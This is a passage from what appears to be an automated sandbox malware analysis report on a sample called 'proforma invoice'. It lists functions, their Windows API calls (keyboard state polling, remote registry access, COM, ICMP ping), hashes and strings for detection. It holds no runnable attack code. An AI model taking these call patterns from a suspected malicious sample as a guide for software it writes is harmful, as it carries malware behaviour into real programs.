                  • GetDlgItem.USER32(?,000003EA), ref: 00B05E44
                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B05E5A
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00B05E67
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$ItemMoveRect$Invalidate
                  • String ID:
                  • API String ID: 3096461208-0
                  • Opcode ID: f56bda51698071005f64a4fa68896e40125b23875b01baa4f502be37e89438cd
                  • Instruction ID: 92039f89740c11e052a3b3ce1699a35e1c87b415176f78b33361cae9e3203138
                  • Opcode Fuzzy Hash: f56bda51698071005f64a4fa68896e40125b23875b01baa4f502be37e89438cd
                  • Instruction Fuzzy Hash: 3151F0B1A00615AFDB18CFA8DD89AAE7BF5FB48300F248269F915E7690DB709D04CF50
                  Function 00AB8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AB8BE8,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AB8FC5
                  • DestroyWindow.USER32(?), ref: 00AB8C81
                  • KillTimer.USER32(00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AB8D1B
                  • DestroyAcceleratorTable.USER32(00000000), ref: 00AF6973
                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AF69A1
                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AF69B8
                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00AB8BBA,00000000), ref: 00AF69D4
                  • DeleteObject.GDI32(00000000), ref: 00AF69E6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                  • String ID:
                  • API String ID: 641708696-0
                  • Opcode ID: 7fa776ae05e6f1e4e1ebf9f32d40ea767aeab8020c459e3e5de953c065c3f5eb
                  • Instruction ID: 9e5184c6bca5d058a503c63ec44e305c1e782e2a9f043552aa26e96b7fb6f30e
                  • Opcode Fuzzy Hash: 7fa776ae05e6f1e4e1ebf9f32d40ea767aeab8020c459e3e5de953c065c3f5eb
                  • Instruction Fuzzy Hash: F361BB71102604DFCB259F6CCA48BB97BF9FB41312F244919E2469B561CB79AC82DFA0
                  Function 00AB9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AB9944: GetWindowLongW.USER32(?,000000EB), ref: 00AB9952
                  • GetSysColor.USER32(0000000F), ref: 00AB9862
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ColorLongWindow
                  • String ID:
                  • API String ID: 259745315-0
                  • Opcode ID: 2156e6dab95dc5c70ba9e2fd449c6e6fa6efb6cdca77c593f57a307b2a55655c
                  • Instruction ID: 0c017c3c925450e6086449b5906cfdd438faef52fff9802296cd533127536131
                  • Opcode Fuzzy Hash: 2156e6dab95dc5c70ba9e2fd449c6e6fa6efb6cdca77c593f57a307b2a55655c
                  • Instruction Fuzzy Hash: 05418131104644AFDB215FB89C85BFE3BB9AB06331F244659FAA6971E2DB319C42DB10
                  Function 00B096E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00AEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00B09717
                  • LoadStringW.USER32(00000000,?,00AEF7F8,00000001), ref: 00B09720
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00AEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00B09742
                  • LoadStringW.USER32(00000000,?,00AEF7F8,00000001), ref: 00B09745
                  • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00B09866
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: HandleLoadModuleString$Message_wcslen
                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                  • API String ID: 747408836-2268648507
                  • Opcode ID: da0383bcc48d3938261fcc2e54a8753ab2eb9fe051fa81db129be2194e554d94
                  • Instruction ID: 4139ed5cd460d3262e3aaf604147a6809ac7ab0b75eb8ad9298be75ca1cb2bf9
                  • Opcode Fuzzy Hash: da0383bcc48d3938261fcc2e54a8753ab2eb9fe051fa81db129be2194e554d94
                  • Instruction Fuzzy Hash: C6410872800219AACF05EBE0CE86EEEB7B8AF56340F604065F505771D2EF256F48CB61
                  Function 00B006DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B007A2
                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B007BE
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B007DA
                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B00804
                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00B0082C
                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B00837
                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B0083C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                  • API String ID: 323675364-22481851
                  • Opcode ID: fc07668b800dea1318cfd2a8df17bd4426455825623cbaf869be8dcbc283386a
                  • Instruction ID: 0d329d0fdb0e625a4cbc2ea10da6bbc89da128973738a71fad3dbbd6cbe19062
                  • Opcode Fuzzy Hash: fc07668b800dea1318cfd2a8df17bd4426455825623cbaf869be8dcbc283386a
                  • Instruction Fuzzy Hash: 9A41F872C10229ABDF15EFA4DD859EEBBB8FF14350F544169E901B71A1EB345E04CBA0
                  Function 00B23C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                  Download Yara Rule
                  APIs
                  • VariantInit.OLEAUT32(?), ref: 00B23C5C
                  • CoInitialize.OLE32(00000000), ref: 00B23C8A
                  • CoUninitialize.OLE32 ref: 00B23C94
                  • _wcslen.LIBCMT ref: 00B23D2D
                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00B23DB1
                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B23ED5
                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00B23F0E
                  • CoGetObject.OLE32(?,00000000,00B3FB98,?), ref: 00B23F2D
                  • SetErrorMode.KERNEL32(00000000), ref: 00B23F40
                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B23FC4
                  • VariantClear.OLEAUT32(?), ref: 00B23FD8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                  • String ID:
                  • API String ID: 429561992-0
                  • Opcode ID: 79115baba27a021271bb2c53e8ed6a4f73855f70e2fe01951ed07e8cbd0d59d3
                  • Instruction ID: 4241825de17bf51b2cdedf9fb8b71c111bfbcba3ed644f305fbca5924e040448
                  • Opcode Fuzzy Hash: 79115baba27a021271bb2c53e8ed6a4f73855f70e2fe01951ed07e8cbd0d59d3
                  • Instruction Fuzzy Hash: 65C168716083159FC700DF68D98492BBBE9FF89B44F1049ADF98A9B250DB34EE05CB52
                  Function 00B17A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                  Download Yara Rule
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 00B17AF3
                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B17B8F
                  • SHGetDesktopFolder.SHELL32(?), ref: 00B17BA3
                  • CoCreateInstance.OLE32(00B3FD08,00000000,00000001,00B66E6C,?), ref: 00B17BEF
                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B17C74
                  • CoTaskMemFree.OLE32(?,?), ref: 00B17CCC
                  • SHBrowseForFolderW.SHELL32(?), ref: 00B17D57
                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B17D7A
                  • CoTaskMemFree.OLE32(00000000), ref: 00B17D81
                  • CoTaskMemFree.OLE32(00000000), ref: 00B17DD6
                  • CoUninitialize.OLE32 ref: 00B17DDC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                  • String ID:
                  • API String ID: 2762341140-0
                  • Opcode ID: 6cf4a855a4e596a31570e167d6a96a70bcc988e94cd5d990d6c0735d8620d7db
                  • Instruction ID: d5b5dd0354e07b97d52a469ad5ee55c577082fadf399434b1f8e24749558dc1d
                  • Opcode Fuzzy Hash: 6cf4a855a4e596a31570e167d6a96a70bcc988e94cd5d990d6c0735d8620d7db
                  • Instruction Fuzzy Hash: 04C11C75A04109AFCB14DFA4D894DAEBBF9FF48314B1484A9E416DB361DB30EE81CB90
                  Function 00B3541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B35504
                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B35515
                  • CharNextW.USER32(00000158), ref: 00B35544
                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B35585
                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B3559B
                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B355AC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$CharNext
                  • String ID:
                  • API String ID: 1350042424-0
                  • Opcode ID: c0552a893833cae39d0648b51b11b82e01beb745cdc21e4a3a531e98fbaf2923
                  • Instruction ID: c008b608e4153cbca7ccbb1d10288c2943ed8478218f9de43650e3649e45b911
                  • Opcode Fuzzy Hash: c0552a893833cae39d0648b51b11b82e01beb745cdc21e4a3a531e98fbaf2923
                  • Instruction Fuzzy Hash: 33617D71904608EFDF20DF94CC85AFE7BF9EB09721F204185F925AB291DB749A81DB60
                  Function 00AFFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                  Download Yara Rule
                  APIs
                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AFFAAF
                  • SafeArrayAllocData.OLEAUT32(?), ref: 00AFFB08
                  • VariantInit.OLEAUT32(?), ref: 00AFFB1A
                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AFFB3A
                  • VariantCopy.OLEAUT32(?,?), ref: 00AFFB8D
                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AFFBA1
                  • VariantClear.OLEAUT32(?), ref: 00AFFBB6
                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00AFFBC3
                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AFFBCC
                  • VariantClear.OLEAUT32(?), ref: 00AFFBDE
                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AFFBE9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                  • String ID:
                  • API String ID: 2706829360-0
                  • Opcode ID: 9c0d882be65180f2c622fb02c002b73cdeac9e47b3b49ea3c978792474387cd6
                  • Instruction ID: 0873df6aba09529039ea045da70713693a268488fb9f7f44e3b6363b81f4d0db
                  • Opcode Fuzzy Hash: 9c0d882be65180f2c622fb02c002b73cdeac9e47b3b49ea3c978792474387cd6
                  • Instruction Fuzzy Hash: 51412C35A00219AFDB10DFA8D8549BEBBB9FF48354F108069F956A7361DB30E945CBA0
                  Function 00B09C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                  Download Yara Rule
                  APIs
                  • GetKeyboardState.USER32(?), ref: 00B09CA1
                  • GetAsyncKeyState.USER32(000000A0), ref: 00B09D22
                  • GetKeyState.USER32(000000A0), ref: 00B09D3D
                  • GetAsyncKeyState.USER32(000000A1), ref: 00B09D57
                  • GetKeyState.USER32(000000A1), ref: 00B09D6C
                  • GetAsyncKeyState.USER32(00000011), ref: 00B09D84
                  • GetKeyState.USER32(00000011), ref: 00B09D96
                  • GetAsyncKeyState.USER32(00000012), ref: 00B09DAE
                  • GetKeyState.USER32(00000012), ref: 00B09DC0
                  • GetAsyncKeyState.USER32(0000005B), ref: 00B09DD8
                  • GetKeyState.USER32(0000005B), ref: 00B09DEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: State$Async$Keyboard
                  • String ID:
                  • API String ID: 541375521-0
                  • Opcode ID: 90ebff0adedc83a53cc04a0868bfb9a75c81d2afd52b98cd30a9744e1554b292
                  • Instruction ID: 44e36c53e1c1886a29d36523499e141d7cb878cf10cd77ff116bb1aabeaeed56
                  • Opcode Fuzzy Hash: 90ebff0adedc83a53cc04a0868bfb9a75c81d2afd52b98cd30a9744e1554b292
                  • Instruction Fuzzy Hash: 0541A8349447C969FF359664C8043B5BEE0EF11344F0481EADAC6575C3DBA59DC8C792
                  Function 00B2055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                  Download Yara Rule
                  APIs
                  • WSAStartup.WSOCK32(00000101,?), ref: 00B205BC
                  • inet_addr.WSOCK32(?), ref: 00B2061C
                  • gethostbyname.WSOCK32(?), ref: 00B20628
                  • IcmpCreateFile.IPHLPAPI ref: 00B20636
                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B206C6
                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B206E5
                  • IcmpCloseHandle.IPHLPAPI(?), ref: 00B207B9
                  • WSACleanup.WSOCK32 ref: 00B207BF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                  • String ID: Ping
                  • API String ID: 1028309954-2246546115
                  • Opcode ID: 04894136b30ad6eb6b9fe92384f1389cdfddab266213f11261cf6dcef5cd34fe
                  • Instruction ID: 8cf38cda3ecf98b7988d841ad342430bc6d59a26b650dad342f0b9c04ff0848c
                  • Opcode Fuzzy Hash: 04894136b30ad6eb6b9fe92384f1389cdfddab266213f11261cf6dcef5cd34fe
                  • Instruction Fuzzy Hash: DE918D356182119FD320EF15D988F1ABBE0EF49318F1485A9F4699B6A3CB30ED45CF91
                  Function 00B28CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharLower
                  • String ID: cdecl$none$stdcall$winapi
                  • API String ID: 707087890-567219261
                  • Opcode ID: 9bb7cb0cbfb5988f71200afe2936ae657db64eb6d3b69a110082212a405b61f0
                  • Instruction ID: 147591e9ae92f377a954fdf8f6541026d46c1be025b75ad190b51fe1e3a849d7
                  • Opcode Fuzzy Hash: 9bb7cb0cbfb5988f71200afe2936ae657db64eb6d3b69a110082212a405b61f0
                  • Instruction Fuzzy Hash: 4151C332A011269BCB14EF6CD9909BEB7E5FF65364B2142A9E42AE72C4DF34DD40C790
                  Function 00B2372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                  Download Yara Rule
                  APIs
                  • CoInitialize.OLE32 ref: 00B23774
                  • CoUninitialize.OLE32 ref: 00B2377F
                  • CoCreateInstance.OLE32(?,00000000,00000017,00B3FB78,?), ref: 00B237D9
                  • IIDFromString.OLE32(?,?), ref: 00B2384C
                  • VariantInit.OLEAUT32(?), ref: 00B238E4
                  • VariantClear.OLEAUT32(?), ref: 00B23936
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                  • API String ID: 636576611-1287834457
                  • Opcode ID: c488e93c7782a56a1fa082a245d47a31231805fab6190b751a0342786ab28792
                  • Instruction ID: 7cfc4cd6bf232c993c8a79c62dffd5db934eb5fb6ebcaf3537418567bb71e3bf
                  • Opcode Fuzzy Hash: c488e93c7782a56a1fa082a245d47a31231805fab6190b751a0342786ab28792
                  • Instruction Fuzzy Hash: EA61C370608311AFD710DF54D888F6EBBE8EF49B14F104889F5899B2A1D774EE48CB92
                  Function 00B13388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                  Download Yara Rule
                  APIs
                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B133CF
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B133F0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LoadString$_wcslen
                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                  • API String ID: 4099089115-3080491070
                  • Opcode ID: b20cec66bfd29f7dbfb12de82d0f046135524d7acd8cc47e8879762852661267
                  • Instruction ID: 05253d418f275b21e94f836b8d27065ee057647b405310bc680147d48da5728e
                  • Opcode Fuzzy Hash: b20cec66bfd29f7dbfb12de82d0f046135524d7acd8cc47e8879762852661267
                  • Instruction Fuzzy Hash: E6517D32900209AADF15EBA0CE42EEEB7B9EF15740F1440A5F405731A2EF252F98DB61
                  Function 00B0B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
